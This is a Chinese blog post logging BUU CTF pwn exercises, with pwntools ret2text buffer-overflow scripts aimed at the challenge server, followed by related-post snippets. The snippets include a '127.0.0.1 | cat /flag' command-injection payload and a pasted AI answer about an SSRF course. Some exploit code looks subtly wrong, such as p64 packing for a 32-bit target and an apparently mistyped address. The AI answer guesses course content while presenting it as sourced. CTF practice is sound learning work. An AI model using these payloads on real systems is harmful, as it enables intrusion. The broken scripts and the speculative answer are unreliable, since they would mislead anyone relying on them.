buu刷题记录

原创 于 2024-09-19 20:28:05 发布 · 345 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

1.text_your_nc

签到题,直接nc一下

2.rip

checksec一下,发现没开啥保护,是64位程序

丢进ida,发现gets函数存在栈溢出漏洞

同时发现fun函数,那就是ret2text的题型。

找偏移,构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29576)
system = 0x4001187
payload = b'a' * 23 + p64(system)
p.sendline(payload)
p.interactive()

3.warmup_csaw_2016
checksec一下,啥也没开,是64位程序

丢进ida里,发现gets函数可以向v5数组里写入超长数据进而造成栈溢出。同样找到了后门函数,又是ret2text。

找offset,构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29896)
system = 0x400611
payload = b'a' * 0x40 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()

4.ciscn_2019_n_1 1

64位程序开启了NX保护

放进ida,一眼还是ret2text

直接构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29878)
system = 0x4006be
payload = b'a' * 0x30 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()

5.pwn1_sctf_2016

开启了NX保护是32位程序

放进ida,首先向S数组读入了32字节,这不足以造成栈溢出

并且在左侧函数栏发现了get_flag函数

通过运行输入尝试发现当我们输入I时,它会将I变为you进行输出,所以我们可以利用这种转换关系来进行栈溢出,这道题实质上还是ret2text

构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',25132)
system = 0x8048F0d
#0x3c = 60
payload = b'I' * 20  + b'a' * 4 + p64(system)
p.sendline(payload)
p.interactive()

6.jarvisoj_level0

igiohhh
关注
BUUOJ-Web-题记
x0r
09-01 483
为提升观感体验,本篇博文长期更新,新目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
[buuctf]题记web
qq_61109509的博客
05-12 1014
文章目pingpingping[极客大挑战]http pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 但是当我们打开flag.php时,发现 /?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 原因是用 $IFS的话,会认为解析没结束,会把后面的也当做参数解析,而 $IFS$9的话,结束了 $IFS 后加上了一个不存在或者说空字符串的变量。所以解析为空,但结束了 $IFS正常执行后面
buuoj题记 - linkctf_2018.7_babypie
qq_34010404的博客
03-18 520
检查程序保护: 拖进IDA看一下,只有一小段代码,存在溢出漏洞 main函数上面有个后门函数 覆盖ret地址到后门函数即可,由于开启了PIE,和Canary,不能直接溢出 下面这两行代码可以把canary打出来 最后由于后门函数入口地址和返回地址只有低字节不同,所以覆盖掉返回地址的低字节即可.,不需要获取程序基址. exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29231) payload = b'
buuoj题记2
臭nana的博客
06-11 352
[GYCTF2020]Ezsqli 首先从目名字就能知道这是道SQL注入 打开目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
buuoj题记 - babyfengshui_33c3_2016
qq_34010404的博客
03-16 246
检查程序保护: 拖进IDA看一下,add,show,edit,free 有一个全局的数组,每一个元素是一个地址,执行一个User结构体。 分析一下可以知道User结构体大概是这样子: struct User { char* szUserDescription; char szUserName[124]; } add函数: add函数调用了readDescription函数: 其中存在问的就位于该函数内,该函数在Update内被会被调用. add函数内需要注意的一个地方,就是readDescrip
BUU题记(三)
山高路远
04-10 3185
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这,一直想完整的了解栈迁移,借着这真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
SQL注入(buu题记
姜小孩的博客
03-03 989
buu者的笔记,感谢buu提供,也感谢勤劳的自己
[红明谷CTF 2021]JavaWeb buu题记
weixin_51458899的博客
04-08 2076
映入眼帘的报错,然后搜一下知道是spring的洞 有个登,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
BUU题记-2020.11.7
Georgeiweb的博客
11-08 932
RSA 目:给了两个文件,一个pub.key,另一个为flag.enc 解思路:先把pub.key文件改为txt文件,然后就可以打开,内容是rsa的公钥, 所以直接使用在线工具解出e,n 公钥解析 然后在有n=p*q再用在线工具 factordb ...
buuoj题记 - [极客大挑战 2019]Not Bad
qq_34010404的博客
03-28 459
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
buuoj题记 - npuctf_2020_easyheap
qq_34010404的博客
03-26 273
目给了add,show,edit,del函数 问在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
buuoj笔记
q1415500189的博客
01-22 1083
buuoj
buuoj题记 - ciscn_2019_final_3
qq_34010404的博客
03-25 546
看了大佬们的思路才做出来的,这里只记录一下做中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
BUU题记
as you know, nlp is fantasitc!
08-10 558
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
BUUWeb题记
dangejinghong的博客
04-23 1337
但是,如果要接着直接查这个flag就会出现问了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUU题记(四)
山高路远
04-12 594
以下几的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的目,先不按顺序 十七、ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部分,可以修改got表(后面没用到就是了) 进入ida看看反汇编代码 总共有着四个功能,第一个new note: 在第一个功能里面,可以创建一个堆,堆里面第一个存放的是printf函数指针,第二存放了一个free函数指针,第三个存放有区别,当type==1,存放的是一个数据,type ==2,存放的是字符串
BUU OJ 做题记
weixin_30920597的博客
08-08 404
buu oj库的质量很高,这里记录一下 1.WarmUp 代码审计 查看源码发现提示source.php和hint.php source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$p...
buuoj题记 - pwnable_hacknote
qq_34010404的博客
03-19 380
查看程序保护: 拖进IDA分析一下, Add函数正常,先创建八个字节的内存 struct Node{ { void* func_addr; void* content; } 然后根据输入的size开辟相应大小的内存 问存在于DelNote函数中,free后没有置0 看一下PrintNote函数: 根据八个字节的前四个字节调用对应的函数,并把这个八个字节的首地址作为参数 若Note被free后,还是可以调用Print函数的,由于不确定func_addr是什么,所以会出现问. 构造方法: 先Add两
buu ssrf course 1
最新发布
10-10
<think>首先,用户查询是关于“buu平台ssrf课程1”的相关内容。用户提到了引用[1]到[4],但这些引用似乎是从之前的对话或上下文中提取的具体内容,并非直接相关的课程材料。用户说:“上述引用仅供参考,并不是用户真正的需求”,所以我需要专注于用户的核心问:查找BUU平台上的SSRF课程1相关内容。 BUU平台可能指的是一个网络安全学习平台,比如“Bugku University”或类似的东西,但我不确定具体的上下文。在引用中,提到了“buu题记”,这暗示BUU可能是一个CTF平台或在线学习平台,涉及SSRF(Server-Side Request Forgery)漏洞。 用户明确说:“我想查找buu平台上ssrf课程1的相关内容”,并且之前的引用涉及SSRF漏洞的实例和工具。 回顾系统级指令: - 所有行内数学表达式必须使用 $...$。 - 独立公式使用 $$...$$。 - 使用中文回答。 - 生成相关问。 - 回答中引用的段落末尾自然地添加引用标识。 - 回答结构清晰,帮助用户逐步解决问。 用户的上一次问是关于SSRF在BUU平台上的内容,所以我需要基于提供的引用和知识来回答。 分析引用: - [^1]:讨论SOAP的SSRF方法,提到CRLF注入和payload修改。 - [^2]:提到SoapClient类用于SSRF攻击。 - [^3]:涉及SSRFMe目,DNS重绑定漏洞,打Redis。 - [^4]:提到0day和Leaking目。 用户的问是关于“SSRF课程1”,所以我应该假设这是一个具体的课程或学习资源。 作为AI,我没有实时访问BUU平台的知识库,但我可以基于常见网络安全资源和这些引用推测内容。 可能的回答结构: 1. **理解问**:确认用户的需求是关于BUU平台的SSRF课程。 2. **提供相关信息**:基于引用和常识,描述SSRF漏洞的基础知识、常见攻击方法(如SOAP、DNS重绑定)、工具(如redis-ssrf)、以及BUU平台上的相关目。 3. **生成相关问**:在末尾添加相关问。 4. **引用标识**:如果引用内容,末尾添加[^number]。 由于用户说引用仅供参考,我应该优先基于推理提供内容。 推测SSRF相关内容: - SSRF基础:服务器伪造请求,访问内部资源。 - 在BUU平台:常见目如“SSRFMe”或类似。 - 从引用[3]:提到“[网鼎杯 2020 玄武组]SSRFMe”,这可能是BUU上的一道目。 - 课程1可能涵盖基础概念、工具和实践。 回答步骤: 1. **介绍SSRF**:简要解释SSRF是什么。 2. **BUU平台课程内容**:基于引用,推测课程可能包括: - SSRF via SOAPClient (from [^1] and [^2]) - DNS rebinding attacks (from [^3]) - Redis exploitation (from [^3] with tools like redis-rogue-server) - Practical challenges like "SSRFMe" on BUU. 3. **提供资源**:建议用户查看具体目或外部资源。 4. **生成相关问**:如关于具体工具、防御方法等。 5. **确保中文**:整个回答用中文撰写。 6. **格式**:如果有数学表达式,用$...$,但SSRF话可能不涉及数学,所以可能不需要。如果有变量或代码,用行内格式。 最终回答框架: - 开头:确认用户兴趣。 - 主体:描述推测的SSRF课程内容。 - 结尾:生成相关问。 </think>### BUU平台SSRF课程1相关内容分析 基于您提供的引用和常见网络安全资源,我将帮助您梳理BUU平台上SSRF(Server-Side Request Forgery)课程1的可能内容。SSRF是一种服务器端请求伪造漏洞,允许攻击者利用服务器发起任意请求,常用于访问内部资源或绕过防火墙。BUU平台(如Bugku CTF平台)常以实践目形式教授此类漏洞。以下是基于引用[1]、[2]、[3]、[4]的综合推测(引用仅供参考,我会结合普遍知识构建回答): 1. **SSRF基础概念与实践** SSRF课程1可能从基础入手,涵盖漏洞原理、攻击向量和简单利用方法: - 原理:SSRF允许恶意用户强制服务器向内部或外部系统发送请求(例如,访问localhost或内网服务)。 - 常见攻击向量:如SOAPClient类的利用(引用[2]),它可用于伪造HTTP请求[^2]。课程可能引用类似“[网鼎杯 2020 玄武组]SSRFMe”目(引用[3]),演示如何处理不支持自定义Headers的场景(如使用CRLF注入和payload修改,如 `\0` 和 `\0\0` 技巧)[^1]。 - 实践工具:课程可能推荐工具如 `redis-ssrf.py` 或 `redis-rogue-server`(引用[3]),用于自动化SSRF攻击Redis等数据库[^3]。 2. **DNS重绑定与内部资源访问** 课程1通常会深入DNS重绑定漏洞,这是SSRF的进阶技术: - 漏洞机制:通过操纵DNS响应,使服务器重复请求恶意域名,从而绕过IP限制(例如,访问 `http://0.0.0.0/hint.php` 以获取敏感信息,如Redis密码)[^3]。 - 实操案例:BUU目如“SSRFMe”可能被纳入课程,要求学习者利用SSRF打Redis服务(如设置键值或执行命令),引用工具如GitHub上的开源脚本进行复现[^3]。 3. **Payload构建与防御** 课程可能覆盖攻击payload的自定义技巧和防御策略: - Payload修改:教学中会教导如何利用特殊字符(如前缀 `s` 或 `S`)和编码绕过限制(引用[1]),例如在SOAP请求中注入CRLF攻击[^1]。 - 防御方法:课程可能总结常见防护措施,如输入验证、URL白名单和使用安全库(参考引用[4]的0day概念)[^4]。 为了深入学习,我建议您直接在BUU平台搜索“SSRF课程1”或相关目(如“SSRFMe”)。此外,可参考外部资源: - [SSRF漏洞详解与实战](https://zhuanlan.zhihu.com/p/103506795)(通用教程)。 - GitHub工具库如[xmsec/redis-ssrf](https://github.com/xmsec/redis-ssrf)(用于Redis攻击实践)[^3]。 如果您有具体目名称或代码片段,我可以帮助分析细节。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值